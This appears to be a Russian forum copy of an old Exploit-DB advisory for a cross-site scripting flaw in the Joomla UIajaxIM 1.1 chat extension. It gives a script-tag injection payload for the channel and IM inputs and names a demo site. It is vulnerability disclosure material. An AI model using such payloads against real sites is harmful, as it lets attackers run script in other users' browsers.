- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9244
- Проверка EDB
-
- Пройдено
- Автор
- 599EME MAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-07-24
Код:
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________
# [+] Joomla Extension UIajaxIM 1.1 Javascript Execution
# [+] Software : Joomla
# [+] Author : 599eme Man
# [+] Contact : [email protected]
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special Thanks : Moudi Aka SixSo brozazaaaaaaaaa
# [+] Download : http://extensions.joomla.org/extensions/communication/chat/9075/details
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerability
#
# [+] Javascript Execution
#
# - Go in : http://www.site.com/ajaxim/, regist you and connect. Join a channel and in the input write : 'r"'><script>alert('xss')</script> (or any javascript after the 'r"'>) and press enter : the javascript is executed.
# - Click on IM anyone and write in the input : 'r"'><script>alert('xss')</script> (or any javascript after the 'r"'>) and press enter : the javascript is executed
#
# [+] Demo
#
# - http://demo.universal-informatique.com/ajaxim/
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################
# milw0rm.com [2009-07-24]
- Источник
- www.exploit-db.com